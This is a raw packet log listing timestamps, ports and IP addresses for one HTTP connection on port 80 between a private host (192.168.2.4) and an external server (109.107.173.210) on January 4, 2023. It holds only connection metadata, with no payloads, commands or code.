Jan 4, 2023 16:47:26.472480059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472501040 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472517014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472546101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472548008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472570896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472589016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472594976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472620010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472637892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472644091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472662926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472693920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472703934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472714901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472728968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472752094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472754955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472779989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472789049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472805977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472814083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472837925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472840071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472862005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472868919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472887039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472891092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472910881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472917080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472935915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472942114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472959995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472970009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472984076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472992897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473007917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473018885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473031998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473043919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473057985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473069906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473082066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473093987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473105907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473114967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473131895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473143101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473155022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473166943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473180056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473193884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473206043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473221064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473229885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473242998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473254919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.473263979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473290920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.473306894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.493786097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493812084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493835926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493859053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493884087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493906975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493915081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.493932009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493963003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493987083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.493990898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494014025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494023085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494038105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494050026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494062901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494076967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494086981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494096041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494113922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494117975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494133949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494139910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494163036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494168997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494189024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494189978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494208097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494215012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494240046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494242907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494263887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494267941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494291067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494294882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494312048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494318008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494338036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494342089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494366884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494369984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494385958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494399071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494410992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494422913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494446039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494446039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494467974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494471073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494493961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494496107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494518995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494519949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494541883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494548082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.494575977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.494596958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.496776104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.496818066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.496843100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.496869087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.496869087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.496893883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.496929884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.497215986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497246981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497272968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497294903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497306108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.497319937 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497345924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497349977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.497370005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497376919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.497395992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497407913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.497420073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497442961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.497445107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.497469902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.497493029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.498316050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.498339891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.498370886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.498392105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.498393059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.498418093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.498425007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.498449087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.498472929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.498925924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.498949051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499000072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499016047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499021053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499047041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499068975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499094009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499103069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499116898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499130964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499145031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499172926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499177933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499207973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499209881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499233007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499258041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499263048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499284029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499300957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499309063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499329090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499335051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499361038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499377966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499385118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499409914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499409914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499434948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499459028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499483109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499488115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499488115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499507904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499514103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499535084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499548912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499557972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499573946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499583960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499598026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499609947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499634981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499644041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499660015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499670029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499684095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499696970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499711037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499732018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499735117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499762058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499768972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499788046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499808073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499814034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499838114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499842882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499865055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499874115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499891043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499902010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499913931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499938965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499964952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499989033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.499993086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499993086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.499993086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500019073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500022888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500031948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500047922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500072002 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500072956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500097036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500099897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500121117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500122070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500142097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500149012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500164986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500227928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500236034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500253916 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500268936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500279903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500296116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500303984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500320911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500333071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500345945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500358105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500374079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500381947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500400066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500411034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500421047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500432968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500456095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500458002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500483990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500485897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500509024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500509977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500526905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500534058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500552893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500562906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500577927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500592947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500602007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500617027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500641108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500663996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500665903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500688076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500699043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500714064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500730991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500737906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500761986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500762939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500788927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.500793934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500817060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.500839949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520411015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520437956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520463943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520517111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520543098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520569086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520570040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520596981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520622015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520643950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520648003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520674944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520675898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520703077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520704031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520729065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520730972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520764112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520765066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520790100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520790100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520818949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520823956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520844936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520847082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520870924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520872116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520895958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520898104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520916939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520925999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520941019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520951986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520977974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.520978928 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.520994902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521003962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521020889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521029949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521047115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521056890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521074057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521083117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521099091 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521107912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521126986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521135092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521151066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521159887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521178007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521187067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521203041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521213055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521230936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521239996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.521256924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.521291018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.522593021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.522672892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.523025990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523056030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.523082018 CET	80	49695	109.107.173.210	192.168.2.4
